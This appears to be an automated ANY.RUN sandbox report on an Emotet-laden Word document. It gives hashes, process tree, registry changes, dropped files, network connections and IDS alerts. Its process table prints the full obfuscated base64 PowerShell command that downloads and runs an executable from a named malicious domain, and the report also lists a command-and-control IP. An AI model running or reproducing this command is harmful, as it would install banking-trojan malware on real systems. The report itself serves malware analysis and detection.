analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PAY46708926878.doc

Full analysis: https://app.any.run/tasks/199d124e-2614-450e-b64c-2311926e2858
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 19:01:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 14:23:00 2019, Last Saved Time/Date: Thu Mar 14 14:23:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

BBF95B7D643DB662929558F5AFCF77B0

SHA1:

60815A618597A1115486368B71B5317BC65B1105

SHA256:

6463B40E63FDB8FE75BED1C9C568C990DD6C52C1A772B81A02C9F4C827BF3B2A

SSDEEP:

6144:o77HUUUUUUUUUUUUUUUUUUUT52Vz/8mReBU7sFD0ZKL+eft20L:o77HUUUUUUUUUUUUUUUUUUUTCDReBU7+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 272.exe (PID: 2636)
      • wabmetagen.exe (PID: 2520)
      • 272.exe (PID: 3248)
      • wabmetagen.exe (PID: 3340)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2888)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2520)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2888)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2888)
      • 272.exe (PID: 3248)
    • Application launched itself

      • 272.exe (PID: 2636)
      • wabmetagen.exe (PID: 2520)
    • Starts itself from another location

      • 272.exe (PID: 3248)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2019:03:14 14:23:00
CreateDate: 2019:03:14 14:23:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 272.exe no specs 272.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PAY46708926878.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2888powershell -e KAAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIABJAG8ALgBjAG8AbQBwAHIARQBTAFMASQBvAE4ALgBEAEUARgBMAEEAVABlAHMAdABSAGUAQQBNACgAIABbAEkATwAuAG0ARQBtAG8AUgB5AHMAVAByAGUAQQBNAF0AIABbAHMAWQBzAHQAZQBNAC4AYwBvAG4AVgBFAFIAVABdADoAOgBGAHIAbwBtAEIAQQBzAGUANgA0AFMAdABSAEkAbgBHACgAIAAoACcAWABaAEoAJwArACcAUgBhADkAcwB3ACcAKwAnAEYASQBYACcAKwAnAC8AJwArACcAaQBoADQATQBTAHMAaABpAE4AOAAnACsAJwBWAGoAVQAnACsAJwBHAFAAJwArACcAbwBqAGIAJwArACcAVQBaACcAKwAnAHQANgB6ACcAKwAnAEQAcgBHACcAKwAnAGEAYgBHAFEAJwArACcAUgAnACsAJwBiACcAKwAnAHYAYgBGACcAKwAnAFYAJwArACcAMgA1ACcAKwAnAEsAUgBsAGQAaAB0ACcAKwAnAHkASAArAGYAMQBpACcAKwAnAFcAaABUAEkAKwBYAGoAMwBQAE8AUABWAGYAJwArACcATwBMAHoAOQBqAEUANABTAFUAcAB5AHcASABSACcAKwAnAGcATwBIAEEAWQBNADEAaABCAEwASABwAFMAJwArACcAcQBmAGsAUgB2AHkAZwBNACcAKwAnAGIAJwArACcAOQBnACcAKwAnAFcAWAAnACsAJwBVAEMAcABRAG0AYwBEADQAcgBBAEcAQgBwACcAKwAnAFMARwB0AGoAJwArACcAKwBoACcAKwAnAHYAUABNAHoAJwArACcAcwB0AGgAYQB5AEcAJwArACcASABwAEgAWABMAGwAJwArACcAZQBkAHAAegB2AGYAMQB4ADkAJwArACcAZgB2ACcAKwAnAGQAMQBRAGUAYgBjAG4ANgAnACsAJwByACcAKwAnAFgAUQBSACcAKwAnAFMAawBLAEsAYgBCAEMAcABTACcAKwAnAHQAMAAnACsAJwBlAFYAbQA0AGYAZQB1AEoAcgBxAGgAJwArACcAdwA4AE8ANABlAEwAJwArACcAdQBSACcAKwAnAGcAOQAnACsAJwBLADYAJwArACcAcQAnACsAJwBXAGkAJwArACcAdgBKAE4AUgBaACcAKwAnAEcANwBQAEYATgBkAE8AeQAnACsAJwBYAFgARQAnACsAJwBsAGoASQAnACsAJwAzAGgAZgAnACsAJwByACsANwAvACcAKwAnADAAJwArACcAWQBQACcAKwAnAEYAOQAyAGkAZAAnACsAJwB0ACcAKwAnAFMAJwArACcAaAAnACsAJwBjACcAKwAnADgAZgBTAGUAZQBmAHgAMgBFAGQAUgAnACsAJwBxACcAKwAnAEcAJwArACcAQQBxAGgAOABlAFYATgA1ADIAJwArACcAUgAnACsAJwBZAGIAegAnACsAJwAzAHEAJwArACcAZgB1ADkAYgBZACcAKwAnAFcAYgAnACsAJwAwAGwAcwA0ACcAKwAnAEQAQgAyAEQAVAByAEoAbwA4AHAAQgAnACsAJwBIADcAdQAxADkAdQBxACsAZwAyAGsAJwArACcASABNACcAKwAnAEEARQAnACsAJwBoAEoAJwArACcANgAvAGUAbgBhAEQAcAAnACsAJwBJADAANQBSAEMAJwArACcASAB0AEoAdwBnACcAKwAnAFoAdAAnACsAJwBEAFkAeQBSADEATQBMAEYAcgBEAEsAbgAnACsAJwBSAFEANwBtADkAMgBBACsAcAAnACsAJwBlAHEANgAxAG8AYwAnACsAJwBVAEYALwAwADgAVgAnACsAJwBaAFkAVQAnACsAJwBGAGQAJwArACcAbgBKAEEARwBXADIAVQAzACcAKwAnADQAdgBYAE0AUwBWACcAKwAnAGYAYwBsAGsAeQBFAEoATwBjACcAKwAnADYANQB3AGUAJwArACcAagBYACcAKwAnAHcAJwArACcANgBuACcAKwAnADkAbAAyACcAKwAnAG0AJwArACcAUgAnACsAJwB0AG0AcQA0AHUAbQBMAFYAVAAnACsAJwByACcAKwAnAFQASAA4AGoARgB6ACcAKwAnAGMAJwArACcAWgBOAGYAcQA2ACcAKwAnAGgAaQBUAE0AZQAwAHYAcwB4ADgAOABjAEkAVQBoACcAKwAnAG8AawBXAHoAJwArACcASwBiAHgAJwArACcAVwBpAFcAaQBjACcAKwAnAEgAdQBIAGUAMgAyAEsAQwB0AFQAawAyAFcARgAnACsAJwB4AEwAKwB5AGIAMAA0AE8AaQBkAHkAcgBCAHYAJwArACcAOAAnACsAJwBqADcAZgBYAGoAVABaAFoARwAnACsAJwBJAFgAMwAnACsAJwBrAFUAMgBaADcAcwBCACsAaQAnACsAJwB0ACcAKwAnAEoARwBiADQASABqAGsAaAAnACsAJwBlACcAKwAnAEgAMQA0AFgAJwArACcAaAAwACcAKwAnAEkAcwBZAG0AJwArACcAUAAnACsAJwA4ACcAKwAnADUAJwArACcAWQBTAEoAOABCAHMAagB5AHoAeABuACcAKwAnADgAJwArACcAQQAnACkAIAApACAALAAgAFsAUwB5AFMAdABFAG0ALgBJAG8ALgBjAG8AbQBQAHIAZQBzAHMAaQBPAE4ALgBDAG8ATQBQAFIAZQBTAHMAaQBvAE4ATQBvAEQARQBdADoAOgBEAEUAQwBPAG0AUAByAEUAcwBTACkAfAAgACUAewAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIAAgAGkATwAuAHMAdABSAGUAQQBtAFIARQBBAEQARQBSACgAJABfACAALAAgAFsAVABlAFgAdAAuAEUAbgBDAG8ARABpAG4AZwBdADoAOgBBAFMAYwBJAEkAIAApAH0AfAAgACUAIAB7ACAAJABfAC4AUgBFAGEARABUAE8AZQBuAEQAKAAgACkAfQAgACkAfAAgAGkATgBWAE8AawBFAC0ARQBYAHAAUgBFAFMAUwBpAG8AbgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2636"C:\Users\admin\272.exe" C:\Users\admin\272.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3248"C:\Users\admin\272.exe"C:\Users\admin\272.exe
272.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2520"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
272.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3340"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 671
Read events
1 258
Write events
408
Delete events
5

Modification events

(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:*=%
Value:
2A3D2500880B0000010000000000000000000000
(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2952) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1315831838
(PID) Process:(2952) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1315831952
(PID) Process:(2952) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1315831953
(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
880B000006C31D6B98DAD40100000000
(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:>?%
Value:
3E3F2500880B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:>?%
Value:
3E3F2500880B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2952) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR911A.tmp.cvr
MD5:
SHA256:
2888powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\17511EDF1W451YNT9ZAZ.temp
MD5:
SHA256:
2888powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2888powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199fef.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Y46708926878.docpgc
MD5:B467524AEEDF6CE6355D916F74009234
SHA256:F10FD5AD5F291F646960C7893E1341147BB6A6396E4E43FDA2587E922640C5AE
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F8B313C273380B644EB92883C0F36F50
SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001
2888powershell.exeC:\Users\admin\272.exeexecutable
MD5:B179D28B0F9EF47279D2664D8154E8AE
SHA256:0DAA1C2E8BF230FF66869BCC1F6A781A7809EA5E6AB8BCF736A3FB84CD64336E
3248272.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:B179D28B0F9EF47279D2664D8154E8AE
SHA256:0DAA1C2E8BF230FF66869BCC1F6A781A7809EA5E6AB8BCF736A3FB84CD64336E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3340
wabmetagen.exe
GET
187.233.152.78:443
http://187.233.152.78:443/
MX
malicious
2888
powershell.exe
GET
200
178.128.41.189:80
http://turningspeech.com/rm44r5z/usg/
GR
executable
359 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3340
wabmetagen.exe
187.233.152.78:443
Uninet S.A. de C.V.
MX
malicious
2888
powershell.exe
178.128.41.189:80
turningspeech.com
Forthnet
GR
suspicious

DNS requests

Domain
IP
Reputation
turningspeech.com
  • 178.128.41.189
suspicious

Threats

PID
Process
Class
Message
2888
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2888
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2888
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2888
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
No debug info